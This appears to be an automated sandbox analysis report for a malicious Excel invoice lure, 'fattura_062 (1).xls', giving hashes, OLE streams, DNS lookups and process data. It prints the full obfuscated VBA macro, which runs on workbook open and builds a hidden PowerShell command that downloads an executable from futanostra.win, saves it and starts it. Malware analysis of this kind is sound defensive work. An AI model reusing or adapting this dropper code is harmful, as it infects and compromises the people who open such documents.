                  Preview:......................>...................................W.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................V....................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...............Y...|...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                  C:\Users\user\Desktop\58230000:Zone.Identifier

                  Download File
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:ASCII text, with CRLF line terminators
                  Category:modified
                  Size (bytes):26
                  Entropy (8bit):3.95006375643621
                  Encrypted:false
                  SSDEEP:3:ggPYV:rPYV
                  MD5:187F488E27DB4AF347237FE461A079AD
                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                  Malicious:false
                  Preview:[ZoneTransfer]....ZoneId=0

                  C:\Users\user\Desktop\fattura_062 (1).xls

                  Download File
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Last Printed: Fri Mar 31 18:31:23 2006, Create Time/Date: Wed Apr 23 09:59:25 2003, Last Saved Time/Date: Wed Aug 9 12:45:36 2017, Security: 0
                  Category:dropped
                  Size (bytes):68608
                  Entropy (8bit):5.499773763083208
                  Encrypted:false
                  SSDEEP:1536:lxEtjPOtioVjDGUU1qfDlaGGx+cL2Qnf9SwwLXoWdPm9QjCld:lxEtjPOtioVjDGUU1qfDlaGGx+cL2Qnz
                  MD5:692F9695E34385CB89ED73F2D732D90B
                  SHA1:021F37AF47F91A1DAD221018CD2BFE725D889E37
                  SHA-256:F3FED05504B1A32AE9FAB6C7EE9BDA57E16A232DD4D864D5250706535E037AAD
                  SHA-512:4E98ECD733E50154E66986CB93F9E7DDC3939068F031B4E187EF910D5BDD0CBEE9D870990D615E121B9822BFD80A669ACDEAE06571A4D9501942F512BB6ADD8E
                  Malicious:true
                  Preview:......................>...................................W.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................V....................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U.......n...z...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h.......j...k...l...m...o...}...p...q...r...s...t...u...v...w...x...y...{...

                  Static File Info

                  General

                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Last Printed: Fri Mar 31 18:31:23 2006, Create Time/Date: Wed Apr 23 09:59:25 2003, Last Saved Time/Date: Wed Aug 9 12:45:36 2017, Security: 0
                  Entropy (8bit):5.576342464068668
                  TrID:
                  • Microsoft Excel sheet (30009/1) 47.99%
                  • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                  • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                  File name:fattura_062 (1).xls
                  File size:67'584 bytes
                  MD5:e1f70fa36ceace829772dcb7acb96d39
                  SHA1:170ed63ed2926a386705365c77832c15af6c8228
                  SHA256:7d763d40795a161b3378f30a073285ba036aa5452ad6c78208a307c8cb9b3c47
                  SHA512:336b9cf6e0eb358e5cd93828f045848622b3501c06ae60f812e0d690b3f6a0e5327dfcc3fbe512c946e8c0c131eeaf6282339c128249f1679fad9cf09a104365
                  SSDEEP:1536:xxEtjPOtioVjDGUU1qfDlaGGx+cL2Qnf9SwwLXoWdPOAVXnpd:xxEtjPOtioVjDGUU1qfDlaGGx+cL2QnC
                  TLSH:1C631829F282DA5AD91603354DD3C2E63736FC11DE17970B3248F31E2FB2A954E0766A
                  File Content Preview:........................>...................................W..................................................................................................................................................................................................

                  File Icon

                  Icon Hash:276ea3a6a6b7bfbf

                  Static OLE Info

                  General

                  Document Type:OLE
                  Number of OLE Files:1

                  OLE File "fattura_062 (1).xls"

                  Indicators
                  Has Summary Info:
                  Application Name:Microsoft Excel
                  Encrypted Document:False
                  Contains Word Document Stream:False
                  Contains Workbook/Book Stream:True
                  Contains PowerPoint Document Stream:False
                  Contains Visio Document Stream:False
                  Contains ObjectPool Stream:False
                  Flash Objects Count:0
                  Contains VBA Macros:True
                  Summary
                  Code Page:1251
                  Last Printed:2006-04-30 17:31:23
                  Create Time:2003-04-23 08:59:25
                  Last Saved Time:2017-08-09 11:45:36
                  Creating Application:Microsoft Excel
                  Security:0
                  Document Summary
                  Document Code Page:1251
                  Thumbnail Scaling Desired:False
                  Contains Dirty Links:False
                  Shared Document:False
                  Changed Hyperlinks:False
                  Application Version:917504

                  Streams with VBA

                  VBA File Name: Foglio1.cls, Stream Size: 1167
                  General
                  Stream Path:_VBA_PROJECT_CUR/VBA/Foglio1
                  VBA File Name:Foglio1.cls
                  Stream Size:1167
                  Data ASCII:. . . . . . . . . L . . . . . . . . . . z . . . . . . . . . . . . . . . . . e . . # . . . . . . . . . . . . . . . . . < . . . . Q J M $ L ' 3 0 . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . C 0 ] K = # = . . . . . . . . . . . . . . . . . . . . . . x . . . . . C 0 ] K = # = . Q J M $ L ' 3 0 . . . . M E . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . 6 " . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0 . 0 . 0 . 0 . - . 0
                  Data Raw:01 16 01 00 02 00 01 00 00 4c 03 00 00 e4 00 00 00 10 02 00 00 7a 03 00 00 88 03 00 00 dc 03 00 00 00 00 00 00 01 00 00 00 b7 a9 b8 65 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 3c 00 ff ff 00 00 2e 98 51 4a 4d 24 fd 4c ad 27 b2 99 f7 c8 33 30 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00
                  VBA Code
                  Attribute VB_Name = "Foglio1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                  VBA File Name: ThisWorkbook.cls, Stream Size: 8424
                  General
                  Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                  VBA File Name:ThisWorkbook.cls
                  Stream Size:8424
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z . . # . . . . . . . . . . . . . . . . . < . . . { A = A c 7 K o . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . A S 4 W J . z . . . . . . . . . . . . . . . . . . . . . . . . x . . . . A S 4 W J . z . . { A = A c 7 K o . . . . M E . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . 6 " . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - . 0 . 0 . 0 . 0 . - . 0 . 0
                  Data Raw:01 16 01 00 03 00 01 00 00 84 08 00 00 e4 00 00 00 10 02 00 00 b2 08 00 00 c0 08 00 00 9c 18 00 00 00 00 00 00 01 00 00 00 b7 a9 e1 5a 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 3c 00 ff ff 00 00 7b ce 41 e7 96 3d e7 41 a7 94 63 37 f2 4b 6f af 19 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00
                  VBA Code
                  Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Sub Workbook_Open()
If xlSecondary > 0 Then
nailscopper = zygotas
Shell nailscopper & glientveiuun, 0
End If
End Sub


Function galvolero()
galvolero = "$fos=''" + "',''';$h" + "it='d" + "f" + "il';$" + "fd=" + "');s" + "ta';$dr='(ne';$ed" + "='j" + "ect '" + ";$ipo=" + "'syst';$" + "kos='t.we';$rem='e" + "nt).do';$sad"
galvolero = galvolero + "='wn" + "l" + "oa';$kp" + "='w-" + "ob'" + ";$nim='e(''" + "';$mo='" + "a" + "';$" + "uy='" + maltibalo(3) + "';$ji" + "='" + maltibalo(2) + ".e" + "x';$po" + "l='em." + "ne';$oe='e''';$jik='rt-p" + "ro';$naw='c" + "ess ''';$lim='bc" + "li';I" + "nv" + "oke-E" + "xp" + "ression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://futanostra.win/foglio.ful'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)"
End Function
Function magaraje()
madagaskarus = "e"
harddisks = Array(Null, Now(), Null, Now(), Null, Now(), Now(), Null, "c" + Chr(77), Now(), Now(), Now(), Now(), Null, Null)
tupertup = Array(Now(), Minute(Now), Second(Now), Now(), Timer(), "D" + "." & madagaskarus + "x", Timer(), Hour(Now), Timer(), Timer(), Timer(), Now())
magaraje = harddisks(8) & tupertup(5)
End Function
Function enchteinerdom()
enchteinerdom = "t"
enchteinerdom = enchteinerdom + "h"
End Function
Function vangafoot()
zeebdd = "O"
vangafoot = Array(Now(), Now(), Now(), Now(), Now(), Now(), Now(), Minute(Now), Second(Now), Minute(Now), Second(Now), Second(Now), "p" + "r" + zeebdd + "^" + "F", Now(), Hour(Now), Timer(), Now())
End Function
Function poltergeystore()
hhneg = "D"
valeygod = Array(Null, Null, Null, Null, Null, 1, Null, Null, Null, 1, Null, Null, "s" + "" + "^ 1" + "", Null, Null, Null, Null, Null)
ganovey = Array(Null, Null, 1, "  -" + "W^" & "I" + "n" & "", Null, 0, Null, Null, Null, Null, "-n" + "O^" + "", Null, Null, Null, Null, Null)
poolnum = Array(Null, Null, Null, 1, Null, 0, Null, Null, Null, Null, Null, Null, Null, Null, 1, "^N" + "i^N" + "t" + "", 0)
poltergeystore = "^." + "e" & molibdensefe & ganovey(10) + "l " + "-No" + poolnum(15) + Chr(94) & ganovey(3) & hhneg + "O^w" + valeygod(12)
End Function
Function chivasgoa()
singhh = Array(Null, Null, Null, Now(), Null, Now(), Null, Now(), Null, "s " + "", Null, Now(), Null, Null, Null, Null)
deepip = Array(Null, Now(), Null, Null, Null, Null, Null, Null, Now(), Null, Null, Null, "p" + "a^" + "", Null, Null, Null)
yehopol = Array(Now(), Null, "Y", Now(), Now(), Now(), Null, Null, "A" + "", Now(), Null, Now(), Null, Null, Null, Null, Null, Null)
chivasgoa = "  " + "B^" + yehopol(2) + deepip(12) + "S^" + singhh(9)
End Function
Function tuplook()
bobsleys = Array(Null, Null, Null, 1, "^he" + "l^" + "l" + "", 0, Null, Null, Null, Null, Null, Null, 0, Null, Null, Null)
regpistol = Array(Null, Null, Null, 1, Null, Null, Null, Null, Null, Null, Null, Null, Null, "^" + "U", Null, Null)
intertvn = Array(Null, " ", Null, Second(Now), Null, Second(Now), "^Ec" + "", Null, Null, Second(Now), Null, Null, Null, Null, Null, Null, Null, Second(Now))
caprureflags = Array(Null, Null, 1, "^E" + "R" + "S" + "", Null, Null, Null, Null, 0, Null, Null, 0, Null, Null, 0, Null)
neelwater = Array(Null, 1, Null, Null, Null, 0, Null, Null, Null, "w" + "", Null, Null, Null, Null, Null, Null, Null)
tooool = "" & "O"
tuplook = "p" + "^" + tooool + Array(neelwater(9) + caprureflags(3) + bobsleys(4) + poltergeystore + " -N" + "o" + vangafoot(12) + "I" + "l" + "e^" + footballr + "X" + intertvn(6) + regpistol(13) & chivasgoa)(0)
End Function
Function maltibalo(LenLetter As Integer)
 Randomize
 maltibalo = Space(LenLetter)
 For iCount% = 1 To LenLetter
 Mid(maltibalo, iCount%, 1) = Chr((Int(97 + (Rnd() * 26))))
 Next
End Function
Function molibdensefe()
deopooter = "^" + "x"
molibdensefe = deopooter + "^e" + "^" + "  "
End Function
Function glientveiuun()
glientveiuun = """" + ""
End Function
Function footballr()
nubic = "" + "  "
footballr = nubic + "-" + "e"
End Function
Function zygotas()
tuumnote = galvolero
seneglrive = "/c """
zygotas = magaraje + "e" + " " + "  " + seneglrive + tuplook + tuumnote
End Function

                  Streams

                  Stream Path: \x1CompObj, File Type: data, Stream Size: 107
                  General
                  Stream Path:\x1CompObj
                  CLSID:
                  File Type:data
                  Stream Size:107
                  Entropy:4.184829500435969
                  Base64 Encoded:True
                  Data ASCII:. . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 1f 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                  Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 276
                  General
                  Stream Path:\x5DocumentSummaryInformation
                  CLSID:
                  File Type:data
                  Stream Size:276
                  Entropy:3.252686336049659
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F o g l i o 1 . . . . . F o g l i o 1 ! P r i n t _ A r e a . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . . . . . . . N a m e d R a n g e s . .
                  Data Raw:fe ff 00 00 06 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a3 00 00 00 02 00 00 00 e3 04 00 00
                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 188
                  General
                  Stream Path:\x5SummaryInformation
                  CLSID:
                  File Type:data
                  Stream Size:188
                  Entropy:3.546481957207964
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . ` . . . . . . . l . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . g w { l . @ . . . T z v . . @ . . . . . . . . . . . . . . . .
                  Data Raw:fe ff 00 00 06 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 8c 00 00 00 06 00 00 00 01 00 00 00 40 00 00 00 12 00 00 00 48 00 00 00 0b 00 00 00 60 00 00 00 0c 00 00 00 6c 00 00 00 0d 00 00 00 78 00 00 00 13 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 10 00 00 00
                  Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 42845
                  General
                  Stream Path:Workbook
                  CLSID:
                  File Type:Applesoft BASIC program data, first line number 16
                  Stream Size:42845
                  Entropy:6.048590502212488
                  Base64 Encoded:True
                  Data ASCII:. . . . . . . . f 2 . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B r u n o S B . . . . a . . . . . . . . = . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . U . H 0 F # 8 . . . . . . . . @ . . . . . . . . . . " . . .
                  Data Raw:09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 42 72 75 6e 6f 53 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                  Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 479
                  General
                  Stream Path:_VBA_PROJECT_CUR/PROJECT
                  CLSID:
                  File Type:ASCII text, with CRLF line terminators
                  Stream Size:479
                  Entropy:5.332529281198938
                  Base64 Encoded:True
                  Data ASCII:I D = " { 3 7 8 9 5 3 B E - D 7 0 8 - 4 E E B - 9 E 0 2 - 8 F 6 5 F D A 6 9 F 6 1 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = F o g l i o 1 / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C B C 9 C 2 C B D F C F D F C F D F C F D F C F
                  Data Raw:49 44 3d 22 7b 33 37 38 39 35 33 42 45 2d 44 37 30 38 2d 34 45 45 42 2d 39 45 30 32 2d 38 46 36 35 46 44 41 36 39 46 36 31 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 46 6f 67 6c 69 6f 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38
                  Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 65
                  General
                  Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                  CLSID:
                  File Type:data
                  Stream Size:65
                  Entropy:2.9823486821471117
                  Base64 Encoded:False
                  Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . F o g l i o 1 . F . o . g . l . i . o . 1 . . . . .
                  Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 46 6f 67 6c 69 6f 31 00 46 00 6f 00 67 00 6c 00 69 00 6f 00 31 00 00 00 00 00
                  Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3631
                  General
                  Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                  CLSID:
                  File Type:data
                  Stream Size:3631
                  Entropy:4.556088970721655
                  Base64 Encoded:False
                  Data ASCII:a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                  Data Raw:cc 61 97 00 00 01 00 ff 19 04 00 00 09 04 00 00 e3 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
                  Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 1778
                  General
                  Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
                  CLSID:
                  File Type:data
                  Stream Size:1778
                  Entropy:4.355087869218315
                  Base64 Encoded:False
                  Data ASCII:K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . K = @ . . V . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . Q . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  Data Raw:93 4b 2a 97 01 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 80 01 00 00 80 00 00 00 80 00 00 00 80 00 00 00 04 00 00 7e 05 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 68 00 00 7f
                  Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 123
                  General
                  Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
                  CLSID:
                  File Type:data
                  Stream Size:123
                  Entropy:2.567377753394855
                  Base64 Encoded:False
                  Data ASCII:r U . . . . . . . . . . . . . . . ~ } . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . L e n L e t t e r l . . . . . . .
                  Data Raw:72 55 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 01 00 00 7e 7d 00 00 7f 00 00 00 00 0a 00 00 00 09 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 09 00 00 00 00 00 03 00 ff ff ff ff 03 00 00 09 d1 02 00 00 00 00 00 00 a9 07 00 00 00 00 00 00 08 00 00 00 00 00 01 00 03 00 00 08 09 00 00 00 4c 65 6e 4c 65 74 74 65 72 6c 00 00 7f 00 00 00 00
                  Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 608
                  General
                  Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
                  CLSID:
                  File Type:data
                  Stream Size:608
                  Entropy:2.35713073489209
                  Base64 Encoded:False
                  Data ASCII:r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . Y . . . . . . . . . . . . . . . . . . . . . . . . + . 4 . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . W . . . . . . . . . . . . . . . . . . . . . . . . . . . . . W . . . . . . . . . . . . . . . . . . . . . . . . . . . . . W . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 . . . . . .
                  Data Raw:72 55 00 01 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 1e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 03 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 31 07 00 00 00 00 00 00 59 07 00 00 00 00 00 00 81 07 00 00 00 00 00 00 ff ff ff ff 09 07 00 00 00 00 00 00 08 00 2b 00 34 00 00 00 a9 07 00 00 00 00 00 00 61 00 00 00 00 00 01 00 d1 07
                  Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 616
                  General
                  Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
                  CLSID:
                  File Type:data
                  Stream Size:616
                  Entropy:2.8201434787369255
                  Base64 Encoded:False
                  Data ASCII:r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . $ . . . . . . . . . . . . ` . . . . . . . . . . . . . . . ( . A . . . . . . . . . . ` . . . . . . . . . . . . . / ( . . . . . . . . . . . ` . . . . . . . . . . . . . / ( . . . . . . . . . . . ` . . ! . . . . . . . . . . / ( . . . . . . . . . . . . ` . . % . . . . . . . . . . / ( . A . . . . . . . . . . ` . . ) . . . . . . . . . . / ( . . . . . . . . . . . ` . . - . . . . . . . . . . / ( . . . . . . . . . . . ` . . 1 . . . . .
                  Data Raw:72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff 00 00 00 00 40 00 00 00 04 00 24 00 01 01 00 00 00 00 02 00 00 00 03 60 00 00 15 04 1c 00 ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 1e 28 00 41 01 00 00 00 00 02 00 01 00 03 60 04 01 19 04 ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff 00 00 00
                  Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 782
                  General
                  Stream Path:_VBA_PROJECT_CUR/VBA/dir
                  CLSID:
                  File Type:data
                  Stream Size:782
                  Entropy:6.437812275687657
                  Base64 Encoded:True
                  Data ASCII:. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . ] [ . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E
                  Data Raw:01 0a b3 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 81 c4 5d 5b 0f 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                  Network Behavior

                  Network Port Distribution

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Oct 31, 2024 14:09:27.290189028 CET5456253192.168.2.228.8.8.8
                  Oct 31, 2024 14:09:27.525120974 CET53545628.8.8.8192.168.2.22
                  Oct 31, 2024 14:09:27.526201010 CET137137192.168.2.22192.168.2.255
                  Oct 31, 2024 14:09:28.282591105 CET137137192.168.2.22192.168.2.255
                  Oct 31, 2024 14:09:29.046982050 CET137137192.168.2.22192.168.2.255
                  Oct 31, 2024 14:10:58.593930960 CET138138192.168.2.22192.168.2.255

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Oct 31, 2024 14:09:27.290189028 CET192.168.2.228.8.8.80xe4fdStandard query (0)futanostra.winA (IP address)IN (0x0001)false

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Oct 31, 2024 14:09:27.525120974 CET8.8.8.8192.168.2.220xe4fdName error (3)futanostra.winnonenoneA (IP address)IN (0x0001)false

                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:09:09:21
                  Start date:31/10/2024
                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                  Imagebase:0x13f100000
                  File size:28'253'536 bytes
